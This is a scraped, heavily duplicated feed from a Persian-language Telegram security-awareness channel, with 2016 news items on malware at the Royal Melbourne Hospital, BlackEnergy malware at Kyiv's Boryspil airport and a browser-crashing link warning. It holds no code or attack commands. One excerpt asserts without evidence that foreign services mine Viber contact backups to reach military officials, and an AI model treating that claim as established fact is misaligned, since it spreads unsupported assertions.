http://www.theage.com.au/victoria/royal-melbourne-hospital-attacked-by-damaging-computer-virus-20160118-gm8m3v.html
http://www.theregister.co.uk/2016/01/19/melbourne_hospital_pathology_wing_splattered_by_virus/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
(ژانویه 2016)
کامپیوترهای بخش پاتولوژی بیمارستان سلطنتی ملبورن در ویکتوریا، استرالیا با نرم افزارهای مخرب در هفته گذشته آلوده شدند. بانک خون به روش های دستی برای پردازش نمونه بازگشته است و پاسخ مراجعان را بصورت تلفنی صرفا ارائه میکند و سیستم های آنلاین این بخش از کار افتاده اند. این موضوع بر رایانه های شخصی با سیستم عامل ویندوز XP تاثیر می گذارد.
برای اطلاعات تکمیلی به ادرسهای زیر مراجعه نمایید:
http://www.theage.com.au/victoria/royal-melbourne-hospital-attacked-by-damaging-computer-virus-20160118-gm8m3v.html
http://www.theregister.co.uk/2016/01/19/melbourne_hospital_pathology_wing_splattered_by_virus/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
The Age
Computer virus wreaking havoc at Royal Melbourne Hospital
A virus has attacked the computer system of one of Melbourne's largest hospital networks, causing chaos for staff and patients who may face delays as a result.
کلیپ تصویری راجع به پریسا تبریز شاهزاده امنیت گوگل👆
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
https://t.me/ict_security 👈 join 👇
https://t.me/ict_security
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
https://t.me/ict_security 👈 join 👇
https://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
📌دولت اوکراین ، روسیه برای حمله سایبری به فرودگاه سرزنش نمود
(2016 ژانویه 18)
پس از شناسایی نرم افزار مخرب انرژی سیاه در شبکه کامپیوتری فرودگاه Boryspil در کیف، اوکراین، دولت این کشور می گوید که مظنون است که روسیه مسئول این کار است. تیم واکنش اضطراری رایانه ای اوکراین (CERT-UA) هشدارداده است که می تواند حملات دیگری نیزاز این نوع به وقوع بپیوندد. انرژی سیاه نرم افزارهای مخربی است که بر روی سیستم های در سه شرکت تولید برق اوکراین در اواخر سال گذشته میلادی کشف شد. CERT-UA به مدیران سیستم ها توصیه مینماید فایل های ثبت ورود به سیستمها را برای تشخیص فعالیت های غیر عادی بررسی نمایند. برای اطلاعت بیشتر :
http://www.scmagazine.com/ukraine-blames-russia-for-cyber-attack-on-airport/article/465675/
http://www.theregister.co.uk/2016/01/18/blackenergy_power_outage_malware_kiev_airport/
http://www.irishtimes.com/news/world/europe/ukraine-blames-russian-hackers-for-airport-attack-1.2501363
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
(2016 ژانویه 18)
پس از شناسایی نرم افزار مخرب انرژی سیاه در شبکه کامپیوتری فرودگاه Boryspil در کیف، اوکراین، دولت این کشور می گوید که مظنون است که روسیه مسئول این کار است. تیم واکنش اضطراری رایانه ای اوکراین (CERT-UA) هشدارداده است که می تواند حملات دیگری نیزاز این نوع به وقوع بپیوندد. انرژی سیاه نرم افزارهای مخربی است که بر روی سیستم های در سه شرکت تولید برق اوکراین در اواخر سال گذشته میلادی کشف شد. CERT-UA به مدیران سیستم ها توصیه مینماید فایل های ثبت ورود به سیستمها را برای تشخیص فعالیت های غیر عادی بررسی نمایند. برای اطلاعت بیشتر :
http://www.scmagazine.com/ukraine-blames-russia-for-cyber-attack-on-airport/article/465675/
http://www.theregister.co.uk/2016/01/18/blackenergy_power_outage_malware_kiev_airport/
http://www.irishtimes.com/news/world/europe/ukraine-blames-russian-hackers-for-airport-attack-1.2501363
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
✅ دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
SC Magazine
Ukraine blames Russia for cyberattack on airport
Kiev warns more cyberattacks likely after Black Energy malware found on server at countrys largest airport.
Forwarded from کانال تخصصی امنیت سایبری «کتاس»
https://telegram.me/Information_security_management
آدرس بالا را به دوستان خود برای عضویت در این گروه معرفی کنيد
دراین کانال راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی پرداخته خواهد شد.
آدرس بالا را به دوستان خود برای عضویت در این گروه معرفی کنيد
دراین کانال راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی پرداخته خواهد شد.
Forwarded from کانال تخصصی امنیت سایبری «کتاس»
https://telegram.me/Information_security_management
آدرس بالا را به دوستان خود برای عضویت در این گروه معرفی کنيد
دراین کانال راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی پرداخته خواهد شد.
آدرس بالا را به دوستان خود برای عضویت در این گروه معرفی کنيد
دراین کانال راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی پرداخته خواهد شد.
مراقب باشید و لینک سایت «کرش سافاری دات کام» را باز نکنید، چون باعث کرش کردن مرورگر شما میشود و شاید شما را مجبور کند که گوشیتان را خاموش و روشن کنید!
شاید تا یکی دو روز دیگر، کاربران ایرانی هم دست به شیطنت بزنند و لینک سایتی را برای شما بفرستند که مراجعه به آن مساوی است با کرش کردن مرورگر سافاری یا کروم شما. باز کردن این سایت حتی ممکن است شما را مجبور کنید که گوشی خود را ریبوت کنید!
قضیه این است که سایت به نام crashsafari دات کام درست شده و در آن تنها ۴ خط کد قرار داده شده است. باز کردن این است حتی میتواند مرورگرهای دسکتاپ را در سیستمهایی که میزان رم و قدرت پردازشگر پایین دارند، دچار مشکل کند و باعث کرش آنها بشود.
1pezeshk.com/archives/2016/01/sending-a-single-link-can-cause-anyones-smartphone-to-crash.html
عضویت:
https://telegram.me/Information_security_management
راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی با شما خواهیم بود.
شاید تا یکی دو روز دیگر، کاربران ایرانی هم دست به شیطنت بزنند و لینک سایتی را برای شما بفرستند که مراجعه به آن مساوی است با کرش کردن مرورگر سافاری یا کروم شما. باز کردن این سایت حتی ممکن است شما را مجبور کنید که گوشی خود را ریبوت کنید!
قضیه این است که سایت به نام crashsafari دات کام درست شده و در آن تنها ۴ خط کد قرار داده شده است. باز کردن این است حتی میتواند مرورگرهای دسکتاپ را در سیستمهایی که میزان رم و قدرت پردازشگر پایین دارند، دچار مشکل کند و باعث کرش آنها بشود.
1pezeshk.com/archives/2016/01/sending-a-single-link-can-cause-anyones-smartphone-to-crash.html
عضویت:
https://telegram.me/Information_security_management
راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی با شما خواهیم بود.
یک پزشک
مراقب باشید و لینک سایت «کرش سافاری دات کام» را باز نکنید، چون باعث کرش کردن مرورگر شما میشود و شاید شما را مجبور کند که گوشیتان…
شاید تا یکی دو روز دیگر، کاربران ایرانی هم دست به شیطنت بزنند و لینک سایتی را برای شما بفرستند که مراجعه به آن مساوی است با کرش کردن مرورگر سافاری یا کروم شما. باز کردن این سایت حتی ممکن است شما [...]
اگر بخواهیم فضای سایبر را از بعد امنیت ملی و امنیت خارجی کشور بررسی کنیم باید به این نکته توجه داشت که چرا در این چند ساله اخیر موج دستگیری جاسوسان در کشور ما به حداقل ممکن رسیده است. با کمی تامل می توان به این نکته رسید که این جاسوسی ها عمدتا از طریق فضای مجازی صورت می گیرد. ویروس استکس نت یا موارد مشابه آن تنها بخش کوچکی از حملات جاسوسی می باشد. آمارهای منتشره از سوی سازمان پدافند غیر عامل گویای این واقعیت است. اما آیا اطلاعات من و شما به درد سرویس های خارجی می خورد یا خیر. با ذکر یک مثال به این سوال پاسخ می دهیم.
مثلا شما در گوشی تلفن همراه خود شماره تلفن یکی از اعضای نهادهای نظامی کشور را دارید و به وضوح نام او را در گوشی همراه خود ثبت کرده اید مثلا آقای اکبری سپاه. واضع است که شما وقتی نرم افزار وایبر را روی گوشی خود نصب می کنید به شما می گوید که یک کپی از اطلاعات گوشی همراه شما در مکان امنی نگهداری می شود اما این که این مکان امن کجاست نمی دانیم. در نهایت با توجه به هکتارها سروری که در کشورهایی مثل آمریکا و اسراییل نصب شده است، آنها با یک سرچ ساده در این سروها می توانند آنچه را که می خواهند پیدا کنند. مثلا کلمات سپاه را سرچ می زنند و از طریق تلفن همراه این افراد به تلفن همراه مسئولین و مراکز نظامی و... دسترسی پیدا می کنند.
منبع کتاب آسیب شناسی فضای مجازی
عضویت:
https://telegram.me/Information_security_management
راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی با شما خواهیم بود.
مثلا شما در گوشی تلفن همراه خود شماره تلفن یکی از اعضای نهادهای نظامی کشور را دارید و به وضوح نام او را در گوشی همراه خود ثبت کرده اید مثلا آقای اکبری سپاه. واضع است که شما وقتی نرم افزار وایبر را روی گوشی خود نصب می کنید به شما می گوید که یک کپی از اطلاعات گوشی همراه شما در مکان امنی نگهداری می شود اما این که این مکان امن کجاست نمی دانیم. در نهایت با توجه به هکتارها سروری که در کشورهایی مثل آمریکا و اسراییل نصب شده است، آنها با یک سرچ ساده در این سروها می توانند آنچه را که می خواهند پیدا کنند. مثلا کلمات سپاه را سرچ می زنند و از طریق تلفن همراه این افراد به تلفن همراه مسئولین و مراکز نظامی و... دسترسی پیدا می کنند.
منبع کتاب آسیب شناسی فضای مجازی
عضویت:
https://telegram.me/Information_security_management
راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی با شما خواهیم بود.